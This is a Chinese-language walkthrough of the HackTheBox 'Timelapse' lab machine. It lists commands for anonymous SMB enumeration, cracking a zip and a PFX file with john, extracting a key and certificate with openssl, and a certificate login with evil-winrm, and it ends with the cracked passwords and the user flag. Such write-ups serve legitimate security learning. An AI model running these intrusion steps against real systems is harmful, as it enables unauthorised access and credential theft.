Timelapse
打开网站发现打不开,扫描一下端口
nmap -A -sV -sC -T4 -p "*" 10.10.11.152
看到了开了445端口,smb服务,尝试使用匿名登陆
使用smbmap
枚举整个域中的samba共享驱动器
smbmap -u guest -p "" -H 10.10.11.152
发现Shares可以利用
smbclient -U "guest" -p "" //10.10.11.152/Shares
使用dir查看当先目录下有什么东西
查看这两个文件夹下有什么东西
发现Dev
下是个备份文件
使用get
命令把他下载下来
发现压缩包里面是进行加密的,我们也不知道密码
使用zip2john
命令将哈希值提取出来
zip2john winrm_backup.zip > hash
使用john
命令对其爆破,得到密码supremelegacy
john --wordlist=/usr/share/wordlists/rockyou.txt hash
# 注意:这是正常操作,因为我之前已经爆破过了,所以需要使用以下命令才会显示密码
john --show hash
解压出来,是一个pfx
格式
// PFX格式百度百科解释
公钥加密技术12号标准(Public Key Cryptography Standards #12,PKCS#12)为存储和传输用户或服务器私钥、公钥和证书指定了一个可移植的格式。它是一种二进制格式,这些文件也称为PFX文件。
pfx文件是经过秘钥加密的,我们可以使用命令openssl
进行分析,并且要同时使用pkcs12
文件工具,生成和分析pkcs12文件
发现我们之前爆破的密码不能用
这里我们需要用命令pfx2john
对pfx文件的hash
导出
pfx2john legacyy_dev_auth.pfx >pfx_hash
再次使用john
爆破一下
john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash
# 注意:这是正常操作,因为我之前已经爆破过了,所以需要使用以下命令才会显示密码
john --show pfx_hash
得到密码thuglegacy
这个密码需要经常用到。
回到我们之前的openssl
进行生成,三个密码都是我们之前生成的得到的thuglegacy
,得到了私钥文件
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
我们还需要在生成一个证书,才能够实现登陆,密码还是thuglegacy
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
因为在开头信息收集的时候看到了开启了5986端口,这个端口是用于横向渗透的端口,可以使用命令evil-winrm
进行连接
具体参数可以百度看一下
evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u
登陆时候密码还是thuglegacy
这里 就直接说答案在哪了不多啰嗦了
user.txt
在Desktop下
得到答案01ffa3cff23a0ecd3d4cbd9abd8f1059
因为有一些命令在操作中还需要输入密码,密码还是thuglegacy